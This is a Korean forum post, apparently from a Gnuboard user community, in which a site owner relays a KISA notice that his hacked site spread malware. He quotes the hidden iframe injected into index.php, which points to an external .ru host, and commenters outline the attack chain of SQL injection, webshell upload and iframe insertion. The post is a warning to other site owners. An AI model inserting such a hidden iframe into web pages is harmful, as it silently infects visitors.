지금이라도 당장~ 홈페이지의 해킹여부를 점검해보시기 바랍니다. 정보
지금이라도 당장~ 홈페이지의 해킹여부를 점검해보시기 바랍니다.본문
사이트가 그리 알려진것도 아닌데 살짝 당황스럽군요...
어제 날짜로 '인터넷진흥원'에서 아래와 같은 메일을 받았습니다.
메일제목 : [한국인터넷진흥원] *** 홈페이지가 악성코드로 의심되는 코드의 배포지로 사용되고 있습니다
귀사의 발전을 기원합니다.
한국인터넷진흥원 인터넷침해대응센터() 종합상황실입니다.
우리원은 민간분야 인터넷침해사고(해킹, 웜.바이러스 등) 예방 및 대응활동 등을 수행하고 있습니다.
※ 근거법령: 정보통신망이용촉진및정보보호등에관한법률 제48조의2(침해사고의 대응 등)
아래 귀사의 홈페이지가 해킹을 당한 후 악성코드가 은닉된 채 방치되어, 홈페이지를 방문하는
인터넷 이용자에게 악성코드 감염 및 개인 정보 유출 등 피해를 주고 있는 것으로 확인되었습니다.
이에 다음과 같이 신속한 대응 조치를 요청하오니 적극 협조하여 주시기 바랍니다.
---------------------------------------------------------------------------------------
*** 홈페이지에서 악성코드로 의심되는 코드를 다운로드하고 있습니다.
()
o 의심되는 코드 다운로드 URL : -
해당 코드를 삭제하시고 해킹피해 원인파악, 보안패치, 웹 방화벽 적용 등 아래 권고사항을 참고하셔서
재발방지대책을 강구하여 주시기 바랍니다.
.....
.....
..... 중간생략 ....
.....
.....
o PHP웹 게시판 취약점 관련 사고분석 및 보안대책
-
.... 이하 생략~~~
....
.... 메일내용 끝
................ 위 메일을 확인후, 내부점검을 통해 확인해보니
설치한 그누보드의 index.php 파일내부 하단에 아래와 같은 코드가 숨어있는것을 확인했습니다.
[숨겨져 있는코드]
<div "display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=973 height=999 ></iframe></div>
일단 호스팅업체에 본 내용을 알리고, 작업된 계정별로 일일히 index.php파일을 확인해보니
두개의 계정만 해킹을 당한것으로 보여서 일단 숨겨진 코드가 있는 계정의 index.php 파일을
수정&코드를 삭제하긴 했는데, 어느 파일엔가 또 숨어있지 않을지 (일일히 다 열어볼수도 없고..) 좀 찝찝하군요.
더욱 황당한건, 지난주 그누최신버젼을 다운받아서 만든 홈페이지의 계정에도 상기 코드가 숨겨져 있더군요. 이게 어떻게 된건지 몰겠습니다.
웹을 통한 해킹인지, 텔넷을 통한 해킹인지 확인할 방법이 없네요.
여러분들도 한번즘 본인의 계정을 확인해보시기 바랍니다. 조심하시고요~~~
어제 날짜로 '인터넷진흥원'에서 아래와 같은 메일을 받았습니다.
메일제목 : [한국인터넷진흥원] *** 홈페이지가 악성코드로 의심되는 코드의 배포지로 사용되고 있습니다
귀사의 발전을 기원합니다.
한국인터넷진흥원 인터넷침해대응센터() 종합상황실입니다.
우리원은 민간분야 인터넷침해사고(해킹, 웜.바이러스 등) 예방 및 대응활동 등을 수행하고 있습니다.
※ 근거법령: 정보통신망이용촉진및정보보호등에관한법률 제48조의2(침해사고의 대응 등)
아래 귀사의 홈페이지가 해킹을 당한 후 악성코드가 은닉된 채 방치되어, 홈페이지를 방문하는
인터넷 이용자에게 악성코드 감염 및 개인 정보 유출 등 피해를 주고 있는 것으로 확인되었습니다.
이에 다음과 같이 신속한 대응 조치를 요청하오니 적극 협조하여 주시기 바랍니다.
---------------------------------------------------------------------------------------
*** 홈페이지에서 악성코드로 의심되는 코드를 다운로드하고 있습니다.
()
o 의심되는 코드 다운로드 URL : -
해당 코드를 삭제하시고 해킹피해 원인파악, 보안패치, 웹 방화벽 적용 등 아래 권고사항을 참고하셔서
재발방지대책을 강구하여 주시기 바랍니다.
.....
.....
..... 중간생략 ....
.....
.....
o PHP웹 게시판 취약점 관련 사고분석 및 보안대책
-
.... 이하 생략~~~
....
.... 메일내용 끝
................ 위 메일을 확인후, 내부점검을 통해 확인해보니
설치한 그누보드의 index.php 파일내부 하단에 아래와 같은 코드가 숨어있는것을 확인했습니다.
[숨겨져 있는코드]
<div "display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=973 height=999 ></iframe></div>
일단 호스팅업체에 본 내용을 알리고, 작업된 계정별로 일일히 index.php파일을 확인해보니
두개의 계정만 해킹을 당한것으로 보여서 일단 숨겨진 코드가 있는 계정의 index.php 파일을
수정&코드를 삭제하긴 했는데, 어느 파일엔가 또 숨어있지 않을지 (일일히 다 열어볼수도 없고..) 좀 찝찝하군요.
더욱 황당한건, 지난주 그누최신버젼을 다운받아서 만든 홈페이지의 계정에도 상기 코드가 숨겨져 있더군요. 이게 어떻게 된건지 몰겠습니다.
웹을 통한 해킹인지, 텔넷을 통한 해킹인지 확인할 방법이 없네요.
여러분들도 한번즘 본인의 계정을 확인해보시기 바랍니다. 조심하시고요~~~
추천
0
0
댓글 4개
Web Deface 당하셨네요.
저런식의 아이프레임 악성코드가 심어져 있는것은 해킹이라기 보다 악성코드가 심어져 있는 사이트 접속후 감염되어 해당 사이트 계정을 접속할때 감염되는 루트라고 하더군요.
저런식의 아이프레임 악성코드가 심어져 있는것은 해킹이라기 보다 악성코드가 심어져 있는 사이트 접속후 감염되어 해당 사이트 계정을 접속할때 감염되는 루트라고 하더군요.
1. 자동화툴을 이용하여 게시물의 인자값에 SQL구문을 입력시켜가며 취약페이지 탐색
2. DB열람 또는 그와 유사한 유추해석으로 사용자 정보 탈취
3. 악성파일 업로드 후 webshell을 이용하여 서버접근 허용상태로 만듬
4. 이때 iframe을 삽입하여 악성파일 전파를 위한 변조
5. 또는 웹 관리자 페이지를 유추하여 접근 시도 후 관리자 로그인을 우회하여 직접 관리자 편집 페이지 공격
6. iframe이 있다는 것은 이미 공격을 당했다는 결과물이며,
공격 목적은 서버접근이 아니라 변조를 통하여 악성코드를 전파하는 것임.
2. DB열람 또는 그와 유사한 유추해석으로 사용자 정보 탈취
3. 악성파일 업로드 후 webshell을 이용하여 서버접근 허용상태로 만듬
4. 이때 iframe을 삽입하여 악성파일 전파를 위한 변조
5. 또는 웹 관리자 페이지를 유추하여 접근 시도 후 관리자 로그인을 우회하여 직접 관리자 편집 페이지 공격
6. iframe이 있다는 것은 이미 공격을 당했다는 결과물이며,
공격 목적은 서버접근이 아니라 변조를 통하여 악성코드를 전파하는 것임.
좋은의견들 감사~~
소잃고 외양간 고친다고.....호스팅쪽은 일단 할수있는거라곤 코드삭제와 텔넷 비번변경 정도고
컴퓨터는 xp방화벽 풀어둔거 재설정하고, 바이러스프로그램돌려서 확인해보는데..
알약 깔아뒀는데.... 젠장 ..기본검사로는 걸리지도 않더만,
정밀검사해보니 스파이웨어가 2개정도 들어있네요...다른 바이러스 프로그램으로 갈아타야겠군요 -_- ;;
단지 index.php파일만 문제가 있는걸까요...괜히 찝찝하군요.
소잃고 외양간 고친다고.....호스팅쪽은 일단 할수있는거라곤 코드삭제와 텔넷 비번변경 정도고
컴퓨터는 xp방화벽 풀어둔거 재설정하고, 바이러스프로그램돌려서 확인해보는데..
알약 깔아뒀는데.... 젠장 ..기본검사로는 걸리지도 않더만,
정밀검사해보니 스파이웨어가 2개정도 들어있네요...다른 바이러스 프로그램으로 갈아타야겠군요 -_- ;;
단지 index.php파일만 문제가 있는걸까요...괜히 찝찝하군요.